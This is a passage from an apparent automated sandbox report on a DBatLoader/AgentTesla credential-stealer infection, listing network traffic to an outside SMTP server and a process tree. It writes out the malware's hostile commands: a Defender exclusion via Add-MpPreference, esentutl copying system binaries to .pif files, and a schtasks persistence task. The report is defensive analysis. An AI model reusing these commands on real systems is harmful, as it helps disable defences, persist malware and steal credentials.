2024-11-26 07:13:12 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49736	104.26.13.205	443	2164	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:27 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-26 07:13:27 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 07:13:27 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e881371cd9c7ca6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2030&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1377358&cwnd=232&unsent_bytes=0&cid=7cf2ec5bb8cc2013&ts=508&x=0"
2024-11-26 07:13:27 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49752	104.26.13.205	443	5300	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:35 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-26 07:13:35 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 07:13:35 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e8813a4ea417c9f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1951&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1407907&cwnd=213&unsent_bytes=0&cid=4596ca72d380f1e0&ts=469&x=0"
2024-11-26 07:13:35 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 26, 2024 08:13:16.101368904 CET	587	49707	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:15 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:16.101553917 CET	49707	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:16.502460957 CET	587	49707	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:16.502639055 CET	49707	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:16.903944016 CET	587	49707	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:13:22.709223986 CET	587	49724	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:22 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:22.710015059 CET	49724	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:23.133065939 CET	587	49724	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:23.134113073 CET	49724	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:23.557454109 CET	587	49724	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:13:30.363990068 CET	587	49742	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:30 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:30.364624023 CET	49742	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:30.776823997 CET	587	49742	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:30.777009964 CET	49742	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:31.189882994 CET	587	49742	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:13:37.980855942 CET	587	49758	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:37 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:37.981103897 CET	49758	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:38.256952047 CET	587	49759	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:38 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:38.257174015 CET	49759	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:38.380130053 CET	587	49758	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:38.380337000 CET	49758	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:38.666889906 CET	587	49759	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:38.667268038 CET	49759	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:38.780121088 CET	587	49758	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:13:39.077609062 CET	587	49759	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:13:48.756012917 CET	587	49785	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:48 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:13:48.757528067 CET	49785	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:13:49.168035030 CET	587	49785	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:13:49.170073986 CET	49785	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:13:49.580632925 CET	587	49785	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:15:08.845628023 CET	587	49960	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:08 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:15:08.845767021 CET	49960	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:15:09.265270948 CET	587	49960	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:15:09.265639067 CET	49960	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:15:09.688299894 CET	587	49960	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:16:08.096524954 CET	587	49990	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:07 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:16:08.096697092 CET	49990	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:16:08.505173922 CET	587	49990	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:16:08.505372047 CET	49990	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:16:08.914354086 CET	587	49990	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:16:17.691826105 CET	587	49991	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:17 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:16:17.692122936 CET	49991	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:16:18.102489948 CET	587	49991	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:16:18.102689981 CET	49991	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:16:18.513209105 CET	587	49991	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:16:22.067133904 CET	587	49992	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:21 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:16:22.073551893 CET	49992	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:16:22.478148937 CET	587	49992	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:16:22.478550911 CET	49992	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:16:22.883847952 CET	587	49992	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:17:00.097520113 CET	587	49993	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:59 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:17:00.101295948 CET	49993	587	192.168.2.5	51.195.88.199	EHLO 609290
Nov 26, 2024 08:17:00.519520998 CET	587	49993	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 609290 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 08:17:00.519701004 CET	49993	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 08:17:00.937932968 CET	587	49993	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 08:17:17.343338013 CET	587	49994	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:17:16 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 08:17:17.364305973 CET	587	49995	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:17:17 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.

Target ID:	0
Start time:	02:12:57
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\2jbMIxCFsK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2jbMIxCFsK.exe"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:13:06
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:13:06
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:13:07
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0x130000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:13:07
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0x130000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:13:08
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Imagebase:	0x130000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:13:08
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:13:08
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:13:09
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x240000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:13:09
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x740000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:13:12
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xef0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:13:12
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:13:12
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xb30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:13:12
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:13:13
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xe40000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:13:13
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:13:13
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:13:13
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0x620000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:13:14
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x210000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:13:16
Start date:	26/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:13:22
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:13:23
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:13:24
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x520000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	02:13:24
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x550000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:13:30
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:13:31
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:13:32
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x110000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	02:13:32
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xeb0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:13:39
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x260000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.7%
Total number of Nodes:	1856
Total number of Limit Nodes:	14

Executed Functions

